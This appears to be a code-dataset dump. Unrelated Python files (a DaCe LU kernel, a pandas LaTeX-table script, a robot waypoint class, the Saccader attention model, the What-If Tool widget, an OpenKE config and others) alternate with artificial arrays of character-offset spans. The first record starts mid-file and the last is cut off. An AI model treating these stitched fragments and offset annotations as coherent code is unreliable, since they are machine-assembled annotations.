out >> A(1, lambda x, y: x + y)[i, j]
out = -i_in * j_in
@dace.tasklet
def div():
ij_in << A[i, j]
jj_in << A[j, j]
out >> A[i, j]
out = ij_in / jj_in
for j in range(i, N, 1):
@dace.map
def k_loop2(k: _[0:i]):
i_in << A[i, k]
j_in << A[k, j]
out >> A(1, lambda x, y: x + y)[i, j]
out = -i_in * j_in
if __name__ == '__main__':
polybench.main(sizes, args, [(0, 'A')], init_array, lu)
| [
[
[
83,
87
]
],
[
[
95,
106
],
[
670,
672
],
[
680,
682
]
],
[
[
114,
118
],
[
141,
145
],
[
224,
228
],
[
700,
704
],
[
816,
820
],
[
1028,
1032
],
[
1245,
1249
]
],
[
[
126,
135
],
[
1476,
1485
]
],
[
[
137,
138
],
[
264,
265
],
[
273,
274
],
[
283,
284
],
[
293,
294
],
[
304,
305
],
[
325,
326
],
[
328,
329
],
[
722,
723
],
[
725,
726
],
[
372,
373
],
[
762,
763
],
[
1224,
1225
]
],
[
[
213,
221
],
[
332,
340
],
[
713,
721
],
[
530,
538
],
[
616,
624
],
[
646,
654
]
],
[
[
254,
259
],
[
1491,
1496
]
],
[
[
315,
319
],
[
1498,
1502
]
],
[
[
349,
359
],
[
1516,
1526
]
],
[
[
733,
735
],
[
1528,
1530
]
]
] |
import pandas as pd
import numpy as np
COLORS_QTY: int = 5
# =============================================================================
# Argument parsing.
# =============================================================================
import argparse
from scipy import integrate
argument_parser: argparse.ArgumentParser = argparse.ArgumentParser(
description="Plot figures based on run data.")
argument_default_values = {
"suffix": 'kissat_ibm',
"folder": "."
}
argument_parser.add_argument('-f', '--folder',
type=str,
action='store',
default=argument_default_values['folder'],
help="Folder in which to look for the file (default: '.')"
)
argument_parser.add_argument('-s', '--suffix',
type=str,
action='store',
default=argument_default_values['suffix'],
help="File suffix used in produce_run_data (default: 'kissat_ibm')"
)
parsed_parameters = argument_parser.parse_args()
folder: str = parsed_parameters.folder
suffix: str = parsed_parameters.suffix
# =============================================================================
# Finished parsing
# =============================================================================
def __rename_strategies__(df: pd.DataFrame) -> pd.DataFrame:
df["strategy"] = df["strategy"].str.replace(
".*-discrimination-based", "discrimination-based", regex=True)
df["strategy"] = df["strategy"].str.replace(
"Info. over Decision/Time", "information-based", regex=False)
df["strategy"] = df["strategy"].str.replace(
"Random", "random", regex=False)
# Rename discrimination component
df["strategy"] = df["strategy"].str.replace(" 10100%", "", regex=False)
df["strategy"] = df["strategy"].str.replace(".00%", "%", regex=False)
df["strategy"] = df["strategy"].str.replace(
"Subset", "subset", regex=False)
df["selection"] = df["strategy"].str.extract(r'^([^+]*) \+ .*')
df["discrimination"] = df["strategy"].str.extract(r'^[^+]* \+ (.*)')
return df
def __filter_best_strategies__(df: pd.DataFrame) -> pd.DataFrame:
# Remove all that don't have timeout correction
df["baseline"] = df["selection"].str.contains(
"random") | df["discrimination"].str.contains("subset")
return df
dico = {}
for i, configurations in enumerate(range(10, 60, 10)):
for j, split in enumerate(range(10, 60, 10)):
ratio = split / 100
detailed_df = pd.read_csv(f"{folder}/detailed_runs_{suffix}_{configurations}_{ratio}.csv")
detailed_df = detailed_df.drop("Unnamed: 0", axis=1)
detailed_df = __rename_strategies__(detailed_df)
df = __filter_best_strategies__(detailed_df)
# Remove subset
df = df[~df["discrimination"].str.contains("subset")]
# Take mean performance
df = df.groupby(["selection", "time"]).mean().reset_index()
df["prediction"] *= 100
for method in df["selection"].unique():
if method not in dico:
dico[method] = np.zeros((5, 5))
data = df[df["selection"] == method]
data = data[["prediction", "time"]].to_numpy()
auc = integrate.trapezoid(data[:, 0], dx=1, axis=0)
dico[method][i, j] = auc / 10000 * 100
COLOR_NAMES = [f"color{i+1}" for i in range(COLORS_QTY)]
for method, values in dico.items():
print("\\begin{table}")
print("\t\\centering")
print("\t\\caption{Percentage of total AUC Evolution for " + method + " on " + suffix.replace("_", " ") + "}")
print("\t\\begin{tabular}{"+ ("c" * 6) + "}")
print("\t\t\\toprule")
print("\t\tConfigurations & 10 & 20 & 30 & 40 & 50 \\\\")
mini = np.min(values)
maxi = np.max(values)
scale = maxi - mini
unit = scale / (len(COLOR_NAMES) - 1)
for j, percent in enumerate(range(10, 60, 10)):
line_values = [float(values[i, j])
for i, _ in enumerate(range(10, 60, 10))]
colors = [COLOR_NAMES[round((x - mini) / unit)] for x in line_values]
print(f"\t\t{percent}\\% & " + " & ".join(f"\\colorbox{{{color}!30}}{{{val:.1f}}}" for color, val in zip(colors, line_values)) + "\\\\")
print("\t\t\\bottomrule")
print("\t\\end{tabular}")
print("\\end{table}")
| [
[
[
7,
19
],
[
2680,
2682
],
[
1487,
1489
],
[
1470,
1472
],
[
2318,
2320
],
[
2301,
2303
]
],
[
[
27,
38
],
[
3261,
3263
],
[
3918,
3920
],
[
3945,
3947
]
],
[
[
40,
50
],
[
52,
55
],
[
3547,
3557
]
],
[
[
247,
255
],
[
328,
336
],
[
302,
310
]
],
[
[
275,
284
],
[
3405,
3414
]
],
[
[
285,
300
],
[
302,
325
],
[
479,
494
],
[
801,
816
],
[
1152,
1167
]
],
[
[
405,
428
],
[
647,
670
],
[
969,
992
]
],
[
[
1132,
1149
],
[
1196,
1213
],
[
1236,
1253
]
],
[
[
1182,
1188
],
[
1190,
1193
],
[
2695,
2701
]
],
[
[
1222,
1228
],
[
1230,
1233
],
[
2718,
2724
],
[
3736,
3742
]
],
[
[
1444,
1465
],
[
2840,
2861
]
],
[
[
2270,
2296
],
[
2888,
2914
]
],
[
[
2515,
2519
],
[
3224,
3228
],
[
3246,
3250
],
[
3463,
3467
],
[
3583,
3587
]
],
[
[
2529,
2530
],
[
3476,
3477
]
],
[
[
2532,
2546
],
[
2727,
2741
]
],
[
[
2588,
2589
],
[
3479,
3480
]
],
[
[
2591,
2596
],
[
2646,
2651
]
],
[
[
2638,
2643
],
[
2744,
2749
]
],
[
[
2666,
2677
],
[
2779,
2790
]
],
[
[
2765,
2776
],
[
2862,
2873
]
],
[
[
2826,
2837
],
[
2915,
2926
]
],
[
[
2883,
2885
],
[
2965,
2967
],
[
2969,
2971
]
],
[
[
2960,
2962
],
[
3059,
3061
]
],
[
[
3054,
3056
],
[
3122,
3124
],
[
3169,
3171
],
[
3298,
3300
],
[
3301,
3303
]
],
[
[
3159,
3165
],
[
3210,
3216
],
[
3251,
3257
],
[
3320,
3326
],
[
3468,
3474
]
],
[
[
3291,
3295
],
[
3347,
3351
]
],
[
[
3340,
3344
],
[
3425,
3429
]
],
[
[
3399,
3402
],
[
3484,
3487
]
],
[
[
3503,
3514
],
[
4008,
4019
],
[
4204,
4215
]
],
[
[
3565,
3571
],
[
3717,
3723
]
],
[
[
3573,
3579
],
[
3925,
3931
],
[
3952,
3958
],
[
4107,
4113
]
],
[
[
3911,
3915
],
[
3979,
3983
],
[
4227,
4231
]
],
[
[
3938,
3942
],
[
3972,
3976
]
],
[
[
3964,
3969
],
[
3995,
4000
]
],
[
[
3988,
3992
],
[
4235,
4239
]
],
[
[
4034,
4035
],
[
4117,
4118
]
],
[
[
4037,
4044
],
[
4285,
4292
]
],
[
[
4086,
4097
],
[
4251,
4262
],
[
4385,
4396
]
],
[
[
4194,
4200
],
[
4377,
4383
]
]
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import csv
import math
import numpy as np
FIELD_SCORE_NUM_OFFSET=6
class Waypoints:
def __init__(self, path, side):
self.points = []
self.number = 0
self.Waypoints_Lap = 0
self.next_target_idx = -1
self.all_field_score = np.ones([18]) # field score state
self._load_waypoints(path, side)
print ('[waypoint]number of waypoints: '+str(len(self.points)))
def _load_waypoints(self, path, side):
with open(path) as f:
lines = csv.reader(f)
for l in lines:
# x,y,radian,target_idx(refer main code)
point = [float(n) for n in l]
point[2] = point[2]*math.pi/180.0
if side == 'r':
point[3] = int(point[3])
else:
point[3] = int(point[4])
print(" "+str(point))
self.points.append(point[0:4])
def get_next_waypoint(self):
self.number = self.number+1
if self.number == len(self.points):
self.Waypoints_Lap = self.Waypoints_Lap+1
print("[waypoint]next lap!!!!!!")
self.number = 0
#print("[waypoint]search target !!!!!!", self.all_field_score)
for i in range(self.number, len(self.points))+range(self.number):
score_num = self.points[i][3]
#print("[waypoint]"+str(score_num))
# 得点と関係ないwaypoint
if score_num == -1:
# 1週目は得点と関係ないwaypointも辿る。
if self.Waypoints_Lap == 0:
return self.points[self.number][0:3]
continue
# 得点と関係あるwaypoint
if self.all_field_score[score_num - FIELD_SCORE_NUM_OFFSET] == 0:
# if already get score, skip search
continue
else:
# if not get score, go to target
print("[waypoint]"+str(i)+"/"+str(len(self.points)))
self.number = i
return self.points[i][0:3]
print("[waypoint]got all field score !!!")
return self.points[self.number][0:3]
def get_current_waypoint(self):
return self.points[self.number]
def get_current_target_number(self):
# target No.
return self.points[self.number][3]
def get_any_waypoint(self, n):
return self.points[n]
def set_number(self, n):
self.number = n
def set_field_score(self, n):
self.all_field_score = n
# print(self.all_field_score)
def check_if_get_field_score(self, n):
score_num = n
if self.all_field_score[score_num - FIELD_SCORE_NUM_OFFSET] == 0:
return True
else:
return False
# if __name__ == "__main__":
# Waypoints('waypoints.csv')
| [
[
[
54,
57
],
[
557,
560
]
],
[
[
65,
69
],
[
738,
742
]
],
[
[
77,
88
],
[
315,
317
]
],
[
[
90,
112
],
[
1771,
1793
],
[
2705,
2727
]
],
[
[
122,
131
]
]
] |
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Saccader-Classification network model.
Saccader model is an image classification model with a hard attention mechanism.
The model uses the saccader model for visual attention
and uses a separate network for classification.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from saccader import utils
from saccader.visual_attention import saccader
from tensorflow.contrib import slim as contrib_slim
from tensorflow_models.slim.nets import nets_factory
from tensorflow_models.slim.nets.nasnet import nasnet
slim = contrib_slim
Saccader = saccader.Saccader
class SaccaderClassNet(Saccader):
"""Saccader-Classification Model.
Network that performs classification on images by taking glimpses at
different locations on an image.
Attributes:
num_classes: (Integer) Number of classification classes.
variable_scope: (String) Name of model variable scope.
attention_groups: (Integer) Number of groups in attention network.
attention_layers_per_group: (Integer) Number of layers in each group in
attention network.
saccader_cell: Saccader Cell object.
representation_network: Representation network object.
glimpse_shape: 2-D tuple of integers indicating glimpse shape.
glimpse_shape_classnet: 2-D tuple of integers indicating classification
network glimpse shape.
glimpse_shape_saccader: 2-D tuple of integers indicating saccader
glimpse shape.
var_list_representation_network: List of variables for the representation
network.
var_list_attention_network: List of variables for the attention network.
var_list_saccader_cell: List of variables for the saccader cell.
var_list_location: List of variables for the location network.
var_list_classification: List of variables for the classification network.
var_list_classnet: List of variables for the classification network.
var_list: List of all model variables.
init_op: Initialization operations for model variables.
"""
def __init__(self, config, variable_scope="saccader_classnet"):
Saccader.__init__(self, config, variable_scope=variable_scope+"/saccader")
self.var_list_saccader = []
self.var_list_classnet = []
self.classnet_type = config.classnet_type
self.num_classes = config.num_classes
self.variable_scope_classnet = variable_scope+"/"+self.classnet_type
self.glimpse_shape_saccader = (-1, -1)
self.glimpse_shape_classnet = config.glimpse_shape
def __call__(self,
images_saccader,
images_classnet,
num_times,
is_training_saccader=False,
is_training_classnet=False,
policy="learned",
stop_gradient_after_representation=False):
logits, locations_t, best_locations_t, endpoints = Saccader.__call__(
self,
images_saccader,
num_times,
is_training=is_training_saccader,
policy=policy,
stop_gradient_after_representation=stop_gradient_after_representation)
self.glimpse_shape_saccader = self.glimpse_shape
image_size_saccader = images_saccader.shape.as_list()[1]
image_size_classnet = images_classnet.shape.as_list()[1]
if self.glimpse_shape_classnet[0] < 0:
self.glimpse_shape_classnet = tuple([int(
image_size_classnet / image_size_saccader *
self.glimpse_shape[0])] * 2)
self.glimpse_shape = self.glimpse_shape_classnet
images_glimpse_t = []
for locations in locations_t:
images_glimpse = utils.extract_glimpse(
images_classnet, size=self.glimpse_shape_classnet, offsets=locations)
images_glimpse_t.append(images_glimpse)
batch_size = images_classnet.shape.as_list()[0]
images_glimpse_t = tf.concat(images_glimpse_t, axis=0)
variables_before = set(tf.global_variables())
reuse = True if self.var_list_classnet else False
with tf.variable_scope(self.variable_scope_classnet, reuse=reuse):
if self.classnet_type == "nasnet":
classnet_config = nasnet.large_imagenet_config()
classnet_config.use_aux_head = 0
classnet_config.drop_path_keep_prob = 1.0
with slim.arg_scope(nasnet.nasnet_large_arg_scope()):
classnet_logits, endpoints_ = nasnet.build_nasnet_large(
images_glimpse_t, self.num_classes,
is_training=is_training_classnet,
config=classnet_config)
elif self.classnet_type == "resnet_v2_50":
network = nets_factory.get_network_fn(
"resnet_v2_50", self.num_classes, is_training=is_training_classnet)
classnet_logits, endpoints_ = network(images_glimpse_t)
endpoints["classnet"] = endpoints_
variables_after = set(tf.global_variables())
logits_t = tf.reshape(classnet_logits, (num_times, batch_size, -1))
logits = tf.reduce_mean(logits_t, axis=0)
if not reuse:
self.var_list_saccader = self.var_list_classification + self.var_list_location
self.var_list_classnet = [
v for v in list(variables_after-variables_before)
if "global_step" not in v.op.name]
self.var_list.extend(self.var_list_classnet)
self.init_op = tf.variables_initializer(var_list=self.var_list)
return logits, locations_t, best_locations_t, endpoints
| [
[
[
863,
878
]
],
[
[
902,
910
]
],
[
[
935,
949
]
],
[
[
958,
984
],
[
4443,
4445
],
[
4507,
4509
],
[
4593,
4595
],
[
5415,
5417
],
[
5453,
5455
],
[
5523,
5525
],
[
5869,
5871
]
],
[
[
1007,
1012
],
[
4218,
4223
]
],
[
[
1051,
1059
],
[
1252,
1260
]
],
[
[
1091,
1111
],
[
1228,
1240
]
],
[
[
1152,
1164
],
[
5176,
5188
]
],
[
[
1212,
1218
],
[
4722,
4728
],
[
4872,
4878
],
[
4946,
4952
]
],
[
[
1221,
1225
],
[
4857,
4861
]
],
[
[
1241,
1249
],
[
1295,
1303
],
[
2757,
2765
],
[
3500,
3508
]
],
[
[
1278,
1294
]
]
] |
class Page(object):
start: int
end: int
domain: str
all_urls: Any
m3u8_dict: dict
__slots__ = ("start", "end", "domain", "all_urls", "m3u8_dict")
def __init__(self, start, end, domain, all_urls = [], **m3u8_dict):
# super().__init__()
self.start = start
self.end = end
self.domain = domain
self.all_urls = all_urls
self.m3u8_dict = m3u8_dict
| [
[
[
7,
11
]
]
] |
import config
import models
import tensorflow as tf
import numpy as np
import os
from sys import argv
os.environ['CUDA_VISIBLE_DEVICES']='0'
#Input training files from benchmarks/FB15K/ folder.
con = config.Config()
#True: Input test files from the same folder.
con.set_in_path("./benchmarks/FB15K237/")
con.set_test_link_prediction(True)
# con.set_test_triple_classification(True)
con.set_work_threads(8)
con.set_train_times(1000)
con.set_nbatches(100)
con.set_alpha(1.0)
con.set_margin(4.0)
con.set_bern(1)
con.set_dimension(200)
con.set_ent_neg_rate(25)
con.set_rel_neg_rate(0)
con.set_opt_method("SGD")
#Models will be exported via tf.Saver() automatically.
con.set_export_files("./res/model.vec.tf", 0)
#Model parameters will be exported to json files automatically.
con.set_out_files("./res/embedding.vec.json")
#Initialize experimental settings.
con.init()
#Set the knowledge embedding model
con.set_model(models.TransD)
#Train the model.
con.run()
#To test models after training needs "set_test_flag(True)".
con.test()
| [
[
[
7,
13
],
[
201,
207
]
],
[
[
21,
27
],
[
915,
921
]
],
[
[
35,
51
]
],
[
[
59,
70
]
],
[
[
78,
80
],
[
103,
105
]
],
[
[
97,
101
]
],
[
[
195,
198
],
[
263,
266
],
[
305,
308
],
[
383,
386
],
[
407,
410
],
[
433,
436
],
[
455,
458
],
[
474,
477
],
[
494,
497
],
[
510,
513
],
[
533,
536
],
[
558,
561
],
[
582,
585
],
[
664,
667
],
[
774,
777
],
[
855,
858
],
[
901,
904
],
[
948,
951
],
[
1018,
1021
]
]
] |
from database.database_util import connect_to_skip_database
from skip_dataset.generate_histogram import generate_histogram
from skip_dataset.generate_track_data import generate_track_data
from skip_dataset.plot_track_sum import plot_track_sum
# File used to execute different functions related to Spotify Sequential Skip Prediction Challenge dataset.
# The functions are roughly grouped in different categories.
# Recommended use is to only execute one at the time,
# each function is explained in the associated file.
if __name__ == '__main__':
# Establish a database connection.
connect_to_skip_database()
# generate_track_data()
# plot_track_sum()
generate_histogram()
| [
[
[
35,
59
],
[
590,
614
]
],
[
[
104,
122
],
[
675,
693
]
],
[
[
168,
187
]
],
[
[
228,
242
]
]
] |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import googleapiclient.discovery
import os
import tensorflow as tf
from IPython import display
from google.protobuf import json_format
from numbers import Number
from six import ensure_str
from tensorboard.plugins.interactive_inference.utils import inference_utils
# Constants used in mutant inference generation.
NUM_MUTANTS_TO_GENERATE = 10
NUM_EXAMPLES_FOR_MUTANT_ANALYSIS = 50
# Custom user agent for tracking number of calls to Cloud AI Platform.
USER_AGENT_FOR_CAIP_TRACKING = 'WhatIfTool'
class WitWidgetBase(object):
"""WIT widget base class for common code between Jupyter and Colab."""
def __init__(self, config_builder):
"""Constructor for WitWidgetBase.
Args:
config_builder: WitConfigBuilder object containing settings for WIT.
"""
tf.logging.set_verbosity(tf.logging.WARN)
config = config_builder.build()
copied_config = dict(config)
self.estimator_and_spec = (
dict(config.get('estimator_and_spec'))
if 'estimator_and_spec' in config else {})
self.compare_estimator_and_spec = (
dict(config.get('compare_estimator_and_spec'))
if 'compare_estimator_and_spec' in config else {})
if 'estimator_and_spec' in copied_config:
del copied_config['estimator_and_spec']
if 'compare_estimator_and_spec' in copied_config:
del copied_config['compare_estimator_and_spec']
self.custom_predict_fn = (
config.get('custom_predict_fn')
if 'custom_predict_fn' in config else None)
self.compare_custom_predict_fn = (
config.get('compare_custom_predict_fn')
if 'compare_custom_predict_fn' in config else None)
self.adjust_prediction_fn = (
config.get('adjust_prediction')
if 'adjust_prediction' in config else None)
self.compare_adjust_prediction_fn = (
config.get('compare_adjust_prediction')
if 'compare_adjust_prediction' in config else None)
self.adjust_example_fn = (
config.get('adjust_example')
if 'adjust_example' in config else None)
self.compare_adjust_example_fn = (
config.get('compare_adjust_example')
if 'compare_adjust_example' in config else None)
if 'custom_predict_fn' in copied_config:
del copied_config['custom_predict_fn']
if 'compare_custom_predict_fn' in copied_config:
del copied_config['compare_custom_predict_fn']
if 'adjust_prediction' in copied_config:
del copied_config['adjust_prediction']
if 'compare_adjust_prediction' in copied_config:
del copied_config['compare_adjust_prediction']
if 'adjust_example' in copied_config:
del copied_config['adjust_example']
if 'compare_adjust_example' in copied_config:
del copied_config['compare_adjust_example']
self.set_examples(config['examples'])
del copied_config['examples']
self.config = copied_config
# If using AI Platform for prediction, set the correct custom prediction
# functions.
if self.config.get('use_aip'):
self.custom_predict_fn = self._predict_aip_model
if self.config.get('compare_use_aip'):
self.compare_custom_predict_fn = self._predict_aip_compare_model
def _get_element_html(self):
return """
<link rel="import" href="/nbextensions/wit-widget/wit_jupyter.html">"""
def set_examples(self, examples):
"""Sets the examples shown in WIT.
The examples are initially set by the examples specified in the config
builder during construction. This method can change which examples WIT
displays.
"""
self.examples = [json_format.MessageToJson(ex) for ex in examples]
self.updated_example_indices = set(range(len(examples)))
def json_to_proto(self, json):
ex = (tf.train.SequenceExample()
if self.config.get('are_sequence_examples')
else tf.train.Example())
json_format.Parse(json, ex)
return ex
def infer_impl(self):
"""Performs inference on examples that require inference."""
indices_to_infer = sorted(self.updated_example_indices)
examples_to_infer = [
self.json_to_proto(self.examples[index]) for index in indices_to_infer]
infer_objs = []
attribution_objs = []
serving_bundle = inference_utils.ServingBundle(
self.config.get('inference_address'),
self.config.get('model_name'),
self.config.get('model_type'),
self.config.get('model_version'),
self.config.get('model_signature'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.estimator_and_spec.get('estimator'),
self.estimator_and_spec.get('feature_spec'),
self.custom_predict_fn)
(predictions, attributions) = (
inference_utils.run_inference_for_inference_results(
examples_to_infer, serving_bundle))
infer_objs.append(predictions)
attribution_objs.append(attributions)
if ('inference_address_2' in self.config or
self.compare_estimator_and_spec.get('estimator') or
self.compare_custom_predict_fn):
serving_bundle = inference_utils.ServingBundle(
self.config.get('inference_address_2'),
self.config.get('model_name_2'),
self.config.get('model_type'),
self.config.get('model_version_2'),
self.config.get('model_signature_2'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.compare_estimator_and_spec.get('estimator'),
self.compare_estimator_and_spec.get('feature_spec'),
self.compare_custom_predict_fn)
(predictions, attributions) = (
inference_utils.run_inference_for_inference_results(
examples_to_infer, serving_bundle))
infer_objs.append(predictions)
attribution_objs.append(attributions)
self.updated_example_indices = set()
return {
'inferences': {'indices': indices_to_infer, 'results': infer_objs},
'label_vocab': self.config.get('label_vocab'),
'attributions': attribution_objs}
def infer_mutants_impl(self, info):
"""Performs mutant inference on specified examples."""
example_index = int(info['example_index'])
feature_name = info['feature_name']
examples = (self.examples if example_index == -1
else [self.examples[example_index]])
examples = [self.json_to_proto(ex) for ex in examples]
scan_examples = [self.json_to_proto(ex) for ex in self.examples[0:50]]
serving_bundles = []
serving_bundles.append(inference_utils.ServingBundle(
self.config.get('inference_address'),
self.config.get('model_name'),
self.config.get('model_type'),
self.config.get('model_version'),
self.config.get('model_signature'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.estimator_and_spec.get('estimator'),
self.estimator_and_spec.get('feature_spec'),
self.custom_predict_fn))
if ('inference_address_2' in self.config or
self.compare_estimator_and_spec.get('estimator') or
self.compare_custom_predict_fn):
serving_bundles.append(inference_utils.ServingBundle(
self.config.get('inference_address_2'),
self.config.get('model_name_2'),
self.config.get('model_type'),
self.config.get('model_version_2'),
self.config.get('model_signature_2'),
self.config.get('uses_predict_api'),
self.config.get('predict_input_tensor'),
self.config.get('predict_output_tensor'),
self.compare_estimator_and_spec.get('estimator'),
self.compare_estimator_and_spec.get('feature_spec'),
self.compare_custom_predict_fn))
viz_params = inference_utils.VizParams(
info['x_min'], info['x_max'],
scan_examples, 10,
info['feature_index_pattern'])
return inference_utils.mutant_charts_for_feature(
examples, feature_name, serving_bundles, viz_params)
def get_eligible_features_impl(self):
"""Returns information about features eligible for mutant inference."""
examples = [self.json_to_proto(ex) for ex in self.examples[
0:NUM_EXAMPLES_FOR_MUTANT_ANALYSIS]]
return inference_utils.get_eligible_features(
examples, NUM_MUTANTS_TO_GENERATE)
def create_sprite(self):
"""Returns an encoded image of thumbnails for image examples."""
# Generate a sprite image for the examples if the examples contain the
# standard encoded image feature.
if not self.examples:
return None
example_to_check = self.json_to_proto(self.examples[0])
feature_list = (example_to_check.context.feature
if self.config.get('are_sequence_examples')
else example_to_check.features.feature)
if 'image/encoded' in feature_list:
example_strings = [
self.json_to_proto(ex).SerializeToString()
for ex in self.examples]
encoded = ensure_str(base64.b64encode(
inference_utils.create_sprite_image(example_strings)))
return 'data:image/png;base64,{}'.format(encoded)
else:
return None
def _json_from_tf_examples(self, tf_examples):
json_exs = []
feature_names = self.config.get('feature_names')
for ex in tf_examples:
# Create a JSON list or dict for each example depending on settings.
# Strip out any explicitly-labeled target feature from the example.
# This is needed because AI Platform models that accept JSON cannot handle
# when non-input features are provided as part of the object to run
# prediction on.
if self.config.get('uses_json_list'):
json_ex = []
for feat in ex.features.feature:
if feature_names and feat in feature_names:
feat_idx = feature_names.index(feat)
else:
feat_idx = int(feat)
if (feat == self.config.get('target_feature') or
feat_idx == self.config.get('target_feature')):
continue
# Ensure the example value list is long enough to add the next feature
# from the tf.Example.
if feat_idx >= len(json_ex):
json_ex.extend([None] * (feat_idx - len(json_ex) + 1))
if ex.features.feature[feat].HasField('int64_list'):
json_ex[feat_idx] = ex.features.feature[feat].int64_list.value[0]
elif ex.features.feature[feat].HasField('float_list'):
json_ex[feat_idx] = ex.features.feature[feat].float_list.value[0]
else:
json_ex[feat_idx] = ensure_str(
ex.features.feature[feat].bytes_list.value[0])
else:
json_ex = {}
for feat in ex.features.feature:
if feat == self.config.get('target_feature'):
continue
if ex.features.feature[feat].HasField('int64_list'):
json_ex[feat] = ex.features.feature[feat].int64_list.value[0]
elif ex.features.feature[feat].HasField('float_list'):
json_ex[feat] = ex.features.feature[feat].float_list.value[0]
else:
json_ex[feat] = ensure_str(
ex.features.feature[feat].bytes_list.value[0])
json_exs.append(json_ex)
return json_exs
def _predict_aip_model(self, examples):
return self._predict_aip_impl(
examples, self.config.get('inference_address'),
self.config.get('model_name'), self.config.get('model_signature'),
self.config.get('force_json_input'), self.adjust_example_fn,
self.adjust_prediction_fn)
def _predict_aip_compare_model(self, examples):
return self._predict_aip_impl(
examples, self.config.get('inference_address_2'),
self.config.get('model_name_2'), self.config.get('model_signature_2'),
self.config.get('compare_force_json_input'),
self.compare_adjust_example_fn,
self.compare_adjust_prediction_fn)
def _predict_aip_impl(self, examples, project, model, version, force_json,
adjust_example, adjust_prediction):
"""Custom prediction function for running inference through AI Platform."""
# Set up environment for GCP call for specified project.
os.environ['GOOGLE_CLOUD_PROJECT'] = project
service = googleapiclient.discovery.build('ml', 'v1', cache_discovery=False)
name = 'projects/{}/models/{}'.format(project, model)
if version is not None:
name += '/versions/{}'.format(version)
# Properly package the examples to send for prediction.
if self.config.get('uses_json_input') or force_json:
examples_for_predict = self._json_from_tf_examples(examples)
else:
examples_for_predict = [{'b64': base64.b64encode(
example.SerializeToString()).decode('utf-8') }
for example in examples]
# If there is a user-specified input example adjustment to make, make it.
if adjust_example:
examples_for_predict = [
adjust_example(ex) for ex in examples_for_predict]
# Send request, including custom user-agent for tracking.
request_builder = service.projects().predict(
name=name,
body={'instances': examples_for_predict}
)
user_agent = request_builder.headers.get('user-agent')
request_builder.headers['user-agent'] = (
USER_AGENT_FOR_CAIP_TRACKING + ('-' + user_agent if user_agent else ''))
response = request_builder.execute()
if 'error' in response:
raise RuntimeError(response['error'])
# Get the key to extract the prediction results from.
results_key = self.config.get('predict_output_tensor')
if results_key is None:
if self.config.get('model_type') == 'classification':
results_key = 'probabilities'
else:
results_key = 'outputs'
# Parse the results from the response and return them.
results = []
attributions = (response['attributions']
if 'attributions' in response else None)
for pred in response['predictions']:
# If the prediction contains a key to fetch the prediction, use it.
if isinstance(pred, dict):
pred = pred[results_key]
# If the model is regression and the response is a list, extract the
# score by taking the first element.
if (self.config.get('model_type') == 'regression' and
isinstance(pred, list)):
pred = pred[0]
# If an prediction adjustment function was provided, use it to adjust
# the prediction.
if adjust_prediction:
pred = adjust_prediction(pred)
results.append(pred)
return {'predictions': results, 'attributions': attributions}
| [
[
[
616,
622
],
[
9629,
9635
],
[
13318,
13324
]
],
[
[
630,
634
]
],
[
[
642,
667
],
[
12887,
12902
]
],
[
[
675,
677
],
[
12827,
12829
]
],
[
[
685,
701
],
[
1411,
1413
],
[
1436,
1438
],
[
4314,
4316
],
[
4410,
4412
]
],
[
[
722,
729
]
],
[
[
758,
769
],
[
4159,
4170
],
[
4434,
4445
]
],
[
[
790,
796
]
],
[
[
813,
823
],
[
9618,
9628
],
[
11221,
11231
],
[
11765,
11775
]
],
[
[
884,
899
],
[
4799,
4814
],
[
5339,
5354
],
[
5685,
5700
],
[
6283,
6298
],
[
7161,
7176
],
[
7838,
7853
],
[
8408,
8423
],
[
8544,
8559
],
[
8881,
8896
],
[
9655,
9670
]
],
[
[
950,
973
],
[
8936,
8959
]
],
[
[
979,
1011
],
[
8835,
8867
]
],
[
[
1089,
1117
],
[
13914,
13942
]
],
[
[
1140,
1153
]
]
] |
dnas = [
['wVW*?', 48, 52, 15.52, 40, 10, -0.23, {'ott_len': 35, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['ftUQf', 46, 66, 10.18, 58, 12, 3.51, {'ott_len': 33, 'ott_percent': 246, 'ott_bw': 117, 'tps_qty_index': 65, 'max_risk': 54}],
['ui*5<', 44, 84, 12.12, 42, 14, 6.81, {'ott_len': 35, 'ott_percent': 232, 'ott_bw': 64, 'tps_qty_index': 21, 'max_risk': 28}],
['-SUNv', 51, 64, 24.47, 58, 12, 3.76, {'ott_len': 26, 'ott_percent': 205, 'ott_bw': 117, 'tps_qty_index': 60, 'max_risk': 64}],
[':YY:_', 54, 59, 21.43, 58, 12, 3.52, {'ott_len': 27, 'ott_percent': 212, 'ott_bw': 122, 'tps_qty_index': 28, 'max_risk': 50}],
['@_W*?', 44, 58, 22.34, 55, 9, 4.25, {'ott_len': 28, 'ott_percent': 220, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
[':VWWv', 55, 61, 23.82, 58, 12, 3.32, {'ott_len': 27, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['7VWWv', 55, 61, 23.82, 58, 12, 3.32, {'ott_len': 27, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
